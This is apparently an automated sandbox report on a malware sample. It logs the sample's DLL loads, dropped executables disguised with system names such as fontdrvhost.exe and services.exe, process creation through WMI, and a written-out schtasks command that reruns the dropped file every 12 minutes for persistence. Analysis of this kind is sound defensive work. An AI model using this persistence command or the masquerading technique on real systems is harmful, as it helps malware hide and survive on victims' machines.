Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: mscoree.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: version.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: wldp.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: profapi.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: sspicli.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: mscoree.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: version.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: uxtheme.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: windows.storage.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: wldp.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: profapi.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: cryptsp.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: rsaenh.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: cryptbase.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: sspicli.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: mscoree.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: version.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: uxtheme.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: windows.storage.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: wldp.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: profapi.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: cryptsp.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: rsaenh.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: cryptbase.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: sspicli.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ktmw32.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: rasapi32.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: rasman.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: rtutils.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: mswsock.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: winhttp.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: iphlpapi.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: dnsapi.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: winnsi.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: rasadhlp.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: fwpuclnt.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: winmm.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: winmmbase.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: mmdevapi.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: devobj.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ksuser.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: avrt.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: audioses.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: powrprof.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: umpdc.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: msacm32.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: midimap.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: dwrite.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: edputil.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: windowscodecs.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ntmarta.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: dpapi.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: secur32.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: schannel.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: mskeyprotect.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ntasn1.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ncrypt.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: ncryptsslp.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: msasn1.dll
Source: C:\Drivers\fontdrvhost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: mscoree.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: apphelp.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: version.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: wldp.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: profapi.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Drivers\fontdrvhost.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Drivers\fontdrvhost.exe	Directory created: C:\Program Files\Internet Explorer\SIGNUP\services.exe			Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Directory created: C:\Program Files\Internet Explorer\SIGNUP\c5b4cb5e9653cc			Jump to behavior

Source: YGk3y6Tdix.exe

Static file information: File size 2312934 > 1048576

Source: YGk3y6Tdix.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: YGk3y6Tdix.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: YGk3y6Tdix.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: YGk3y6Tdix.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: YGk3y6Tdix.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: YGk3y6Tdix.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: YGk3y6Tdix.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: YGk3y6Tdix.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: YGk3y6Tdix.exe

Source: YGk3y6Tdix.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: YGk3y6Tdix.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: YGk3y6Tdix.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: YGk3y6Tdix.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: YGk3y6Tdix.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

File created: C:\Drivers\__tmp_rar_sfx_access_check_5317375

Jump to behavior

Source: YGk3y6Tdix.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FBF640 push ecx; ret	0_2_00FBF653
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FBEB78 push eax; ret	0_2_00FBEB96
Source: C:\Drivers\fontdrvhost.exe	Code function: 4_2_00007FFD9B883850 push BEFFFFFEh; retf	4_2_00007FFD9B883855
Source: C:\Drivers\fontdrvhost.exe	Code function: 4_2_00007FFD9B882773 pushad ; ret	4_2_00007FFD9B882778
Source: C:\Drivers\fontdrvhost.exe	Code function: 4_2_00007FFD9B8853D4 push cs; ret	4_2_00007FFD9B8853D9
Source: C:\Drivers\fontdrvhost.exe	Code function: 4_2_00007FFD9B885996 pushad ; ret	4_2_00007FFD9B88599B
Source: C:\Drivers\fontdrvhost.exe	Code function: 4_2_00007FFD9BC70301 push cs; iretd	4_2_00007FFD9BC7033A
Source: C:\Drivers\fontdrvhost.exe	Code function: 4_2_00007FFD9BC702D4 push cs; iretd	4_2_00007FFD9BC7033A
Source: C:\Drivers\fontdrvhost.exe	Code function: 4_2_00007FFD9BC701C4 push es; iretd	4_2_00007FFD9BC70242
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 23_2_00007FFD9B8932D6 push cs; iretd	23_2_00007FFD9B8932D7
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 23_2_00007FFD9B8B4827 push E9FFFFFFh; retf	23_2_00007FFD9B8B482C
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 23_2_00007FFD9B8B7525 push ebx; iretd	23_2_00007FFD9B8B756A
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 23_2_00007FFD9B883850 push BEFFFFFEh; retf	23_2_00007FFD9B883855
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 23_2_00007FFD9B882773 pushad ; ret	23_2_00007FFD9B882778
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 23_2_00007FFD9B8853D4 push cs; ret	23_2_00007FFD9B8853D9
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 23_2_00007FFD9B885996 pushad ; ret	23_2_00007FFD9B88599B
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 24_2_00007FFD9B8B3850 push BEFFFFFEh; retf	24_2_00007FFD9B8B3855
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 24_2_00007FFD9B8B2773 pushad ; ret	24_2_00007FFD9B8B2778
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 24_2_00007FFD9B8B53D4 push cs; ret	24_2_00007FFD9B8B53D9
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Code function: 24_2_00007FFD9B8B5996 pushad ; ret	24_2_00007FFD9B8B599B
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B8C4827 push E9FFFFFFh; retf	25_2_00007FFD9B8C482C
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B8C74D5 push ebx; iretd	25_2_00007FFD9B8C756A
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B8A32D6 push cs; iretd	25_2_00007FFD9B8A32D7
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B893850 push BEFFFFFEh; retf	25_2_00007FFD9B893855
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B892773 pushad ; ret	25_2_00007FFD9B892778
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B8953D4 push cs; ret	25_2_00007FFD9B8953D9
Source: C:\Drivers\fontdrvhost.exe	Code function: 25_2_00007FFD9B895996 pushad ; ret	25_2_00007FFD9B89599B
Source: C:\Drivers\fontdrvhost.exe	Code function: 26_2_00007FFD9B8A3850 push BEFFFFFEh; retf	26_2_00007FFD9B8A3855
Source: C:\Drivers\fontdrvhost.exe	Code function: 26_2_00007FFD9B8A2773 pushad ; ret	26_2_00007FFD9B8A2778
Source: C:\Drivers\fontdrvhost.exe	Code function: 26_2_00007FFD9B8A53D4 push cs; ret	26_2_00007FFD9B8A53D9
Source: C:\Drivers\fontdrvhost.exe	Code function: 26_2_00007FFD9B8A5996 pushad ; ret	26_2_00007FFD9B8A599B

Source: fontdrvhost.exe.0.dr	Static PE information: section name: .text entropy: 7.56520810942533
Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe.4.dr	Static PE information: section name: .text entropy: 7.56520810942533
Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe0.4.dr	Static PE information: section name: .text entropy: 7.56520810942533
Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe1.4.dr	Static PE information: section name: .text entropy: 7.56520810942533
Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe2.4.dr	Static PE information: section name: .text entropy: 7.56520810942533
Source: services.exe.4.dr	Static PE information: section name: .text entropy: 7.56520810942533

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Drivers\fontdrvhost.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\Drivers\fontdrvhost.exe

File created: C:\Program Files\Internet Explorer\SIGNUP\services.exe

Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Drivers\fontdrvhost.exe

File written: C:\Program Files\Internet Explorer\SIGNUP\services.exe

Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe

Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\sRuyTvnC.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\LRGWtOLy.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\Default\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\BimGJlFQ.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\MihenAyR.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\tWFZTedC.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\jqKBOCJa.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\RKjvWuQm.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\bsCLGWVU.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\aFStzZSn.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\knlJjCXV.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Program Files\Internet Explorer\SIGNUP\services.exe	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\CANODYsk.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	File created: C:\Drivers\fontdrvhost.exe	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\szTqaJAi.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\iIcaGucE.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\jWKBqQkB.log	Jump to dropped file

Source: C:\Drivers\fontdrvhost.exe

File created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe

Jump to dropped file

Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\knlJjCXV.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\aFStzZSn.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\jqKBOCJa.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\MihenAyR.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\CANODYsk.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\tWFZTedC.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\sRuyTvnC.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\iIcaGucE.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\LRGWtOLy.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\BimGJlFQ.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\szTqaJAi.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\jWKBqQkB.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\bsCLGWVU.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	File created: C:\Users\user\Desktop\RKjvWuQm.log	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Drivers\fontdrvhost.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /f

Source: C:\Drivers\fontdrvhost.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Drivers\fontdrvhost.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
